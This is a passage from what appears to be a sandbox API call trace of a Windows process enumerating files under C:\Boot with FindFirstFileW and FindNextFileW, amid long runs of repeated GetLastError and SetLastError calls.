hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.634] GetLastError () returned 0x0 [0132.634] SetLastError (dwErrCode=0x0) [0132.634] GetLastError () returned 0x0 [0132.634] SetLastError (dwErrCode=0x0) [0132.634] GetLastError () returned 0x0 [0132.634] SetLastError (dwErrCode=0x0) [0132.635] GetLastError () returned 0x0 [0132.635] SetLastError (dwErrCode=0x0) [0132.635] GetLastError () returned 0x0 [0132.635] SetLastError (dwErrCode=0x0) [0132.635] GetLastError () returned 0x0 [0132.635] SetLastError (dwErrCode=0x0) [0132.635] GetLastError () returned 0x0 [0132.635] SetLastError (dwErrCode=0x0) [0132.635] GetLastError () returned 0x0 [0132.635] SetLastError (dwErrCode=0x0) [0132.635] GetLastError () returned 0x0 [0132.635] SetLastError (dwErrCode=0x0) [0132.635] GetLastError () returned 0x0 [0132.635] SetLastError (dwErrCode=0x0) [0132.635] GetLastError () returned 0x0 [0132.635] SetLastError (dwErrCode=0x0) [0132.635] GetLastError () returned 0x0 [0132.635] SetLastError (dwErrCode=0x0) [0132.635] GetLastError () returned 0x0 [0132.635] SetLastError (dwErrCode=0x0) [0132.635] GetLastError () returned 0x0 [0132.635] SetLastError (dwErrCode=0x0) [0132.635] GetLastError () returned 0x0 [0132.635] SetLastError (dwErrCode=0x0) [0132.635] GetLastError () returned 0x0 [0132.635] SetLastError (dwErrCode=0x0) [0132.635] GetLastError () returned 0x0 [0132.635] SetLastError (dwErrCode=0x0) [0132.636] GetLastError () returned 0x0 [0132.636] SetLastError (dwErrCode=0x0) [0132.636] GetLastError () returned 0x0 [0132.636] SetLastError (dwErrCode=0x0) [0132.636] GetLastError () returned 0x0 [0132.636] SetLastError (dwErrCode=0x0) [0132.636] GetLastError () returned 0x0 [0132.636] SetLastError (dwErrCode=0x0) [0132.636] GetLastError () returned 0x0 [0132.636] SetLastError (dwErrCode=0x0) [0132.636] GetLastError () returned 0x0 [0132.636] SetLastError (dwErrCode=0x0) [0132.636] GetLastError () returned 0x0 [0132.636] SetLastError (dwErrCode=0x0) [0132.636] GetLastError () returned 0x0 [0132.636] SetLastError (dwErrCode=0x0) [0132.636] GetLastError () returned 0x0 [0132.636] SetLastError (dwErrCode=0x0) [0132.636] GetLastError () returned 0x0 [0132.636] SetLastError (dwErrCode=0x0) [0132.636] GetLastError () returned 0x0 [0132.636] SetLastError (dwErrCode=0x0) [0132.636] GetLastError () returned 0x0 [0132.636] SetLastError (dwErrCode=0x0) [0132.636] GetLastError () returned 0x0 [0132.636] SetLastError (dwErrCode=0x0) [0132.636] GetLastError () returned 0x0 [0132.637] SetLastError (dwErrCode=0x0) [0132.637] GetLastError () returned 0x0 [0132.637] SetLastError (dwErrCode=0x0) [0132.637] GetLastError () returned 0x0 [0132.637] SetLastError (dwErrCode=0x0) [0132.637] GetLastError () returned 0x0 [0132.637] SetLastError (dwErrCode=0x0) [0132.637] GetLastError () returned 0x0 [0132.637] SetLastError (dwErrCode=0x0) [0132.637] GetLastError () returned 0x0 [0132.637] SetLastError (dwErrCode=0x0) [0132.637] GetLastError () returned 0x0 [0132.637] SetLastError (dwErrCode=0x0) [0132.637] GetLastError () returned 0x0 [0132.637] SetLastError (dwErrCode=0x0) [0132.637] GetLastError () returned 0x0 [0132.637] SetLastError (dwErrCode=0x0) [0132.637] GetLastError () returned 0x0 [0132.637] SetLastError (dwErrCode=0x0) [0132.637] GetLastError () returned 0x0 [0132.637] SetLastError (dwErrCode=0x0) [0132.637] GetLastError () returned 0x0 [0132.637] SetLastError (dwErrCode=0x0) [0132.637] GetLastError () returned 0x0 [0132.637] SetLastError (dwErrCode=0x0) [0132.637] GetLastError () returned 0x0 [0132.637] SetLastError (dwErrCode=0x0) [0132.637] GetLastError () returned 0x0 [0132.638] SetLastError (dwErrCode=0x0) [0132.638] GetLastError () returned 0x0 [0132.638] SetLastError (dwErrCode=0x0) [0132.638] GetLastError () returned 0x0 [0132.638] SetLastError (dwErrCode=0x0) [0132.638] GetLastError () returned 0x0 [0132.638] SetLastError (dwErrCode=0x0) [0132.638] GetLastError () returned 0x0 [0132.638] SetLastError (dwErrCode=0x0) [0132.638] GetLastError () returned 0x0 [0132.638] SetLastError (dwErrCode=0x0) [0132.638] GetLastError () returned 0x0 [0132.638] SetLastError (dwErrCode=0x0) [0132.638] GetLastError () returned 0x0 [0132.638] SetLastError (dwErrCode=0x0) [0132.638] GetLastError () returned 0x0 [0132.638] SetLastError (dwErrCode=0x0) [0132.638] GetLastError () returned 0x0 [0132.638] SetLastError (dwErrCode=0x0) [0132.638] GetLastError () returned 0x0 [0132.638] SetLastError (dwErrCode=0x0) [0132.638] GetLastError () returned 0x0 [0132.638] SetLastError (dwErrCode=0x0) [0132.638] GetLastError () returned 0x0 [0132.638] SetLastError (dwErrCode=0x0) [0132.638] GetLastError () returned 0x0 [0132.639] SetLastError (dwErrCode=0x0) [0132.639] GetLastError () returned 0x0 [0132.639] SetLastError (dwErrCode=0x0) [0132.639] GetLastError () returned 0x0 [0132.639] SetLastError (dwErrCode=0x0) [0132.639] GetLastError () returned 0x0 [0132.640] SetLastError (dwErrCode=0x0) [0132.640] GetLastError () returned 0x0 [0132.640] SetLastError (dwErrCode=0x0) [0132.641] GetLastError () returned 0x0 [0132.641] SetLastError (dwErrCode=0x0) [0132.641] GetLastError () returned 0x0 [0132.641] SetLastError (dwErrCode=0x0) [0132.641] GetLastError () returned 0x0 [0132.641] SetLastError (dwErrCode=0x0) [0132.641] GetLastError () returned 0x0 [0132.641] SetLastError (dwErrCode=0x0) [0132.641] GetLastError () returned 0x0 [0132.641] SetLastError (dwErrCode=0x0) [0132.641] GetLastError () returned 0x0 [0132.641] SetLastError (dwErrCode=0x0) [0132.641] GetLastError () returned 0x0 [0132.641] SetLastError (dwErrCode=0x0) [0132.641] GetLastError () returned 0x0 [0132.641] SetLastError (dwErrCode=0x0) [0132.641] GetLastError () returned 0x0 [0132.641] SetLastError (dwErrCode=0x0) [0132.641] GetLastError () returned 0x0 [0132.641] SetLastError (dwErrCode=0x0) [0132.641] GetLastError () returned 0x0 [0132.641] SetLastError (dwErrCode=0x0) [0132.641] GetLastError () returned 0x0 [0132.641] SetLastError (dwErrCode=0x0) [0132.641] GetLastError () returned 0x0 [0132.641] SetLastError (dwErrCode=0x0) [0132.642] GetLastError () returned 0x0 [0132.642] SetLastError (dwErrCode=0x0) [0132.642] GetLastError () returned 0x0 [0132.642] SetLastError (dwErrCode=0x0) [0132.642] GetLastError () returned 0x0 [0132.642] SetLastError (dwErrCode=0x0) [0132.642] GetLastError () returned 0x0 [0132.642] SetLastError (dwErrCode=0x0) [0132.642] GetLastError () returned 0x0 [0132.642] SetLastError (dwErrCode=0x0) [0132.642] GetLastError () returned 0x0 [0132.642] SetLastError (dwErrCode=0x0) [0132.642] GetLastError () returned 0x0 [0132.642] SetLastError (dwErrCode=0x0) [0132.642] GetLastError () returned 0x0 [0132.642] SetLastError (dwErrCode=0x0) [0132.642] GetLastError () returned 0x0 [0132.642] SetLastError (dwErrCode=0x0) [0132.642] GetLastError () returned 0x0 [0132.642] SetLastError (dwErrCode=0x0) [0132.642] GetLastError () returned 0x0 [0132.642] SetLastError (dwErrCode=0x0) [0132.642] GetLastError () returned 0x0 [0132.642] SetLastError (dwErrCode=0x0) [0132.642] GetLastError () returned 0x0 [0132.642] SetLastError (dwErrCode=0x0) [0132.642] GetLastError () returned 0x0 [0132.643] SetLastError (dwErrCode=0x0) [0132.643] GetLastError () returned 0x0 [0132.643] SetLastError (dwErrCode=0x0) [0132.643] GetLastError () returned 0x0 [0132.643] SetLastError (dwErrCode=0x0) [0132.643] GetLastError () returned 0x0 [0132.643] SetLastError (dwErrCode=0x0) [0132.643] GetLastError () returned 0x0 [0132.643] SetLastError (dwErrCode=0x0) [0132.643] GetLastError () returned 0x0 [0132.643] SetLastError (dwErrCode=0x0) [0132.643] GetLastError () returned 0x0 [0132.643] SetLastError (dwErrCode=0x0) [0132.643] GetLastError () returned 0x0 [0132.643] SetLastError (dwErrCode=0x0) [0132.643] GetLastError () returned 0x0 [0132.643] SetLastError (dwErrCode=0x0) [0132.643] GetLastError () returned 0x0 [0132.643] SetLastError (dwErrCode=0x0) [0132.643] GetLastError () returned 0x0 [0132.643] SetLastError (dwErrCode=0x0) [0132.643] GetLastError () returned 0x0 [0132.643] SetLastError (dwErrCode=0x0) [0132.643] GetLastError () returned 0x0 [0132.643] SetLastError (dwErrCode=0x0) [0132.643] GetLastError () returned 0x0 [0132.644] SetLastError (dwErrCode=0x0) [0132.644] GetLastError () returned 0x0 [0132.644] SetLastError (dwErrCode=0x0) [0132.644] GetLastError () returned 0x0 [0132.644] SetLastError (dwErrCode=0x0) [0132.644] GetLastError () returned 0x0 [0132.644] SetLastError (dwErrCode=0x0) [0132.644] GetLastError () returned 0x0 [0132.644] SetLastError (dwErrCode=0x0) [0132.644] GetLastError () returned 0x0 [0132.644] SetLastError (dwErrCode=0x0) [0132.644] GetLastError () returned 0x0 [0132.644] SetLastError (dwErrCode=0x0) [0132.644] GetLastError () returned 0x0 [0132.644] SetLastError (dwErrCode=0x0) [0132.644] GetLastError () returned 0x0 [0132.644] SetLastError (dwErrCode=0x0) [0132.644] GetLastError () returned 0x0 [0132.644] SetLastError (dwErrCode=0x0) [0132.644] GetLastError () returned 0x0 [0132.644] SetLastError (dwErrCode=0x0) [0132.644] GetLastError () returned 0x0 [0132.644] SetLastError (dwErrCode=0x0) [0132.644] GetLastError () returned 0x0 [0132.644] SetLastError (dwErrCode=0x0) [0132.644] GetLastError () returned 0x0 [0132.645] SetLastError (dwErrCode=0x0) [0132.645] GetLastError () returned 0x0 [0132.645] SetLastError (dwErrCode=0x0) [0132.645] GetLastError () returned 0x0 [0132.645] SetLastError (dwErrCode=0x0) [0132.645] GetLastError () returned 0x0 [0132.645] SetLastError (dwErrCode=0x0) [0132.645] GetLastError () returned 0x0 [0132.645] SetLastError (dwErrCode=0x0) [0132.645] GetLastError () returned 0x0 [0132.645] SetLastError (dwErrCode=0x0) [0132.645] GetLastError () returned 0x0 [0132.645] SetLastError (dwErrCode=0x0) [0132.645] GetLastError () returned 0x0 [0132.645] SetLastError (dwErrCode=0x0) [0132.645] GetLastError () returned 0x0 [0132.645] SetLastError (dwErrCode=0x0) [0132.645] GetLastError () returned 0x0 [0132.645] SetLastError (dwErrCode=0x0) [0132.645] GetLastError () returned 0x0 [0132.645] SetLastError (dwErrCode=0x0) [0132.645] GetLastError () returned 0x0 [0132.645] SetLastError (dwErrCode=0x0) [0132.645] GetLastError () returned 0x0 [0132.645] SetLastError (dwErrCode=0x0) [0132.645] GetLastError () returned 0x0 [0132.645] SetLastError (dwErrCode=0x0) [0132.645] GetLastError () returned 0x0 [0132.646] SetLastError (dwErrCode=0x0) [0132.646] GetLastError () returned 0x0 [0132.646] SetLastError (dwErrCode=0x0) [0132.646] GetLastError () returned 0x0 [0132.646] SetLastError (dwErrCode=0x0) [0132.646] GetLastError () returned 0x0 [0132.646] SetLastError (dwErrCode=0x0) [0132.646] GetLastError () returned 0x0 [0132.646] SetLastError (dwErrCode=0x0) [0132.646] GetLastError () returned 0x0 [0132.646] SetLastError (dwErrCode=0x0) [0132.646] GetLastError () returned 0x0 [0132.646] SetLastError (dwErrCode=0x0) [0132.646] GetLastError () returned 0x0 [0132.646] SetLastError (dwErrCode=0x0) [0132.646] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.646] GetLastError () returned 0x0 [0132.646] SetLastError (dwErrCode=0x0) [0132.646] GetLastError () returned 0x0 [0132.646] SetLastError (dwErrCode=0x0) [0132.646] GetLastError () returned 0x0 [0132.646] SetLastError (dwErrCode=0x0) [0132.646] GetLastError () returned 0x0 [0132.646] SetLastError (dwErrCode=0x0) [0132.646] GetLastError () returned 0x0 [0132.646] SetLastError (dwErrCode=0x0) [0132.646] GetLastError () returned 0x0 [0132.647] SetLastError (dwErrCode=0x0) [0132.647] GetLastError () returned 0x0 [0132.647] SetLastError (dwErrCode=0x0) [0132.647] GetLastError () returned 0x0 [0132.647] SetLastError (dwErrCode=0x0) [0132.647] GetLastError () returned 0x0 [0132.647] SetLastError (dwErrCode=0x0) [0132.647] GetLastError () returned 0x0 [0132.647] SetLastError (dwErrCode=0x0) [0132.647] GetLastError () returned 0x0 [0132.647] SetLastError (dwErrCode=0x0) [0132.647] GetLastError () returned 0x0 [0132.647] SetLastError (dwErrCode=0x0) [0132.647] GetLastError () returned 0x0 [0132.647] SetLastError (dwErrCode=0x0) [0132.647] GetLastError () returned 0x0 [0132.647] SetLastError (dwErrCode=0x0) [0132.647] GetLastError () returned 0x0 [0132.647] SetLastError (dwErrCode=0x0) [0132.647] GetLastError () returned 0x0 [0132.647] SetLastError (dwErrCode=0x0) [0132.647] GetLastError () returned 0x0 [0132.647] SetLastError (dwErrCode=0x0) [0132.647] GetLastError () returned 0x0 [0132.647] SetLastError (dwErrCode=0x0) [0132.647] GetLastError () returned 0x0 [0132.647] SetLastError (dwErrCode=0x0) [0132.647] GetLastError () returned 0x0 [0132.648] SetLastError (dwErrCode=0x0) [0132.648] GetLastError () returned 0x0 [0132.648] SetLastError (dwErrCode=0x0) [0132.648] GetLastError () returned 0x0 [0132.648] SetLastError (dwErrCode=0x0) [0132.648] GetLastError () returned 0x0 [0132.648] SetLastError (dwErrCode=0x0) [0132.648] GetLastError () returned 0x0 [0132.648] SetLastError (dwErrCode=0x0) [0132.648] GetLastError () returned 0x0 [0132.648] SetLastError (dwErrCode=0x0) [0132.648] GetLastError () returned 0x0 [0132.648] SetLastError (dwErrCode=0x0) [0132.648] GetLastError () returned 0x0 [0132.648] SetLastError (dwErrCode=0x0) [0132.648] GetLastError () returned 0x0 [0132.648] SetLastError (dwErrCode=0x0) [0132.648] GetLastError () returned 0x0 [0132.648] SetLastError (dwErrCode=0x0) [0132.648] GetLastError () returned 0x0 [0132.648] SetLastError (dwErrCode=0x0) [0132.649] GetLastError () returned 0x0 [0132.649] SetLastError (dwErrCode=0x0) [0132.649] GetLastError () returned 0x0 [0132.649] SetLastError (dwErrCode=0x0) [0132.649] GetLastError () returned 0x0 [0132.649] SetLastError (dwErrCode=0x0) [0132.649] GetLastError () returned 0x0 [0132.649] SetLastError (dwErrCode=0x0) [0132.649] GetLastError () returned 0x0 [0132.649] SetLastError (dwErrCode=0x0) [0132.649] GetLastError () returned 0x0 [0132.649] SetLastError (dwErrCode=0x0) [0132.649] GetLastError () returned 0x0 [0132.649] SetLastError (dwErrCode=0x0) [0132.649] GetLastError () returned 0x0 [0132.649] SetLastError (dwErrCode=0x0) [0132.649] GetLastError () returned 0x0 [0132.649] SetLastError (dwErrCode=0x0) [0132.649] GetLastError () returned 0x0 [0132.649] SetLastError (dwErrCode=0x0) [0132.649] GetLastError () returned 0x0 [0132.649] SetLastError (dwErrCode=0x0) [0132.650] GetLastError () returned 0x0 [0132.650] SetLastError (dwErrCode=0x0) [0132.650] GetLastError () returned 0x0 [0132.650] SetLastError (dwErrCode=0x0) [0132.650] GetLastError () returned 0x0 [0132.650] SetLastError (dwErrCode=0x0) [0132.650] GetLastError () returned 0x0 [0132.650] SetLastError (dwErrCode=0x0) [0132.650] GetLastError () returned 0x0 [0132.650] SetLastError (dwErrCode=0x0) [0132.650] GetLastError () returned 0x0 [0132.650] SetLastError (dwErrCode=0x0) [0132.650] GetLastError () returned 0x0 [0132.650] SetLastError (dwErrCode=0x0) [0132.650] GetLastError () returned 0x0 [0132.650] SetLastError (dwErrCode=0x0) [0132.650] GetLastError () returned 0x0 [0132.650] SetLastError (dwErrCode=0x0) [0132.650] GetLastError () returned 0x0 [0132.650] SetLastError (dwErrCode=0x0) [0132.650] GetLastError () returned 0x0 [0132.650] SetLastError (dwErrCode=0x0) [0132.650] GetLastError () returned 0x0 [0132.650] SetLastError (dwErrCode=0x0) [0132.650] GetLastError () returned 0x0 [0132.650] SetLastError (dwErrCode=0x0) [0132.650] GetLastError () returned 0x0 [0132.651] SetLastError (dwErrCode=0x0) [0132.651] GetLastError () returned 0x0 [0132.651] SetLastError (dwErrCode=0x0) [0132.651] GetLastError () returned 0x0 [0132.651] SetLastError (dwErrCode=0x0) [0132.651] GetLastError () returned 0x0 [0132.651] SetLastError (dwErrCode=0x0) [0132.651] GetLastError () returned 0x0 [0132.651] SetLastError (dwErrCode=0x0) [0132.651] GetLastError () returned 0x0 [0132.651] SetLastError (dwErrCode=0x0) [0132.651] GetLastError () returned 0x0 [0132.651] SetLastError (dwErrCode=0x0) [0132.651] GetLastError () returned 0x0 [0132.651] SetLastError (dwErrCode=0x0) [0132.651] GetLastError () returned 0x0 [0132.651] SetLastError (dwErrCode=0x0) [0132.651] GetLastError () returned 0x0 [0132.651] SetLastError (dwErrCode=0x0) [0132.651] GetLastError () returned 0x0 [0132.651] SetLastError (dwErrCode=0x0) [0132.651] GetLastError () returned 0x0 [0132.651] SetLastError (dwErrCode=0x0) [0132.651] GetLastError () returned 0x0 [0132.651] SetLastError (dwErrCode=0x0) [0132.651] GetLastError () returned 0x0 [0132.651] SetLastError (dwErrCode=0x0) [0132.651] GetLastError () returned 0x0 [0132.652] SetLastError (dwErrCode=0x0) [0132.652] GetLastError () returned 0x0 [0132.652] SetLastError (dwErrCode=0x0) [0132.652] GetLastError () returned 0x0 [0132.652] SetLastError (dwErrCode=0x0) [0132.652] GetLastError () returned 0x0 [0132.652] SetLastError (dwErrCode=0x0) [0132.652] GetLastError () returned 0x0 [0132.652] SetLastError (dwErrCode=0x0) [0132.652] GetLastError () returned 0x0 [0132.652] SetLastError (dwErrCode=0x0) [0132.652] GetLastError () returned 0x0 [0132.652] SetLastError (dwErrCode=0x0) [0132.652] GetLastError () returned 0x0 [0132.652] SetLastError (dwErrCode=0x0) [0132.652] GetLastError () returned 0x0 [0132.652] SetLastError (dwErrCode=0x0) [0132.652] GetLastError () returned 0x0 [0132.652] SetLastError (dwErrCode=0x0) [0132.652] GetLastError () returned 0x0 [0132.652] SetLastError (dwErrCode=0x0) [0132.652] GetLastError () returned 0x0 [0132.652] SetLastError (dwErrCode=0x0) [0132.652] GetLastError () returned 0x0 [0132.652] SetLastError (dwErrCode=0x0) [0132.652] GetLastError () returned 0x0 [0132.652] SetLastError (dwErrCode=0x0) [0132.652] GetLastError () returned 0x0 [0132.653] SetLastError (dwErrCode=0x0) [0132.653] GetLastError () returned 0x0 [0132.653] SetLastError (dwErrCode=0x0) [0132.653] GetLastError () returned 0x0 [0132.653] SetLastError (dwErrCode=0x0) [0132.653] GetLastError () returned 0x0 [0132.653] SetLastError (dwErrCode=0x0) [0132.653] GetLastError () returned 0x0 [0132.653] SetLastError (dwErrCode=0x0) [0132.653] GetLastError () returned 0x0 [0132.653] SetLastError (dwErrCode=0x0) [0132.653] GetLastError () returned 0x0 [0132.653] SetLastError (dwErrCode=0x0) [0132.653] GetLastError () returned 0x0 [0132.653] SetLastError (dwErrCode=0x0) [0132.653] GetLastError () returned 0x0 [0132.653] SetLastError (dwErrCode=0x0) [0132.653] GetLastError () returned 0x0 [0132.653] SetLastError (dwErrCode=0x0) [0132.653] GetLastError () returned 0x0 [0132.653] SetLastError (dwErrCode=0x0) [0132.653] GetLastError () returned 0x0 [0132.653] SetLastError (dwErrCode=0x0) [0132.653] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.653] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.654] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.654] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 0 [0132.654] FindClose (in: hFindFile=0xa281c8 | out: hFindFile=0xa281c8) returned 1 [0132.656] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2247a58 | out: hHeap=0x20f0000) returned 1 [0132.656] FindNextFileW (in: hFindFile=0xa279c8, lpFindFileData=0x253fc28 | out: lpFindFileData=0x253fc28) returned 1 [0132.656] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\*", lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 0xa281c8 [0132.656] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.656] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.656] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.656] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.656] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.656] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.656] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.656] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.657] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.657] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.657] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.657] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.657] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.657] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.657] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\da-DK\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.657] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.657] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.657] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.657] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.657] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.657] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.657] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\de-DE\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.658] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.658] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.658] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.658] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.658] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.658] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.658] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\el-GR\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.658] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.658] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.658] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.658] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.658] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.658] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.658] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-US\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.659] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.659] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.659] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.659] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.659] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.659] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.659] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.659] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\es-ES\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.659] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.659] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.659] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.659] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.659] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.659] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.659] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fi-FI\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.660] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.660] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.660] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.660] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.660] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.660] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.660] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Fonts\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.660] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.660] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.660] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.660] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.660] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.660] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.661] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.661] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.661] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.661] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.661] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-FR\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.661] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.661] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 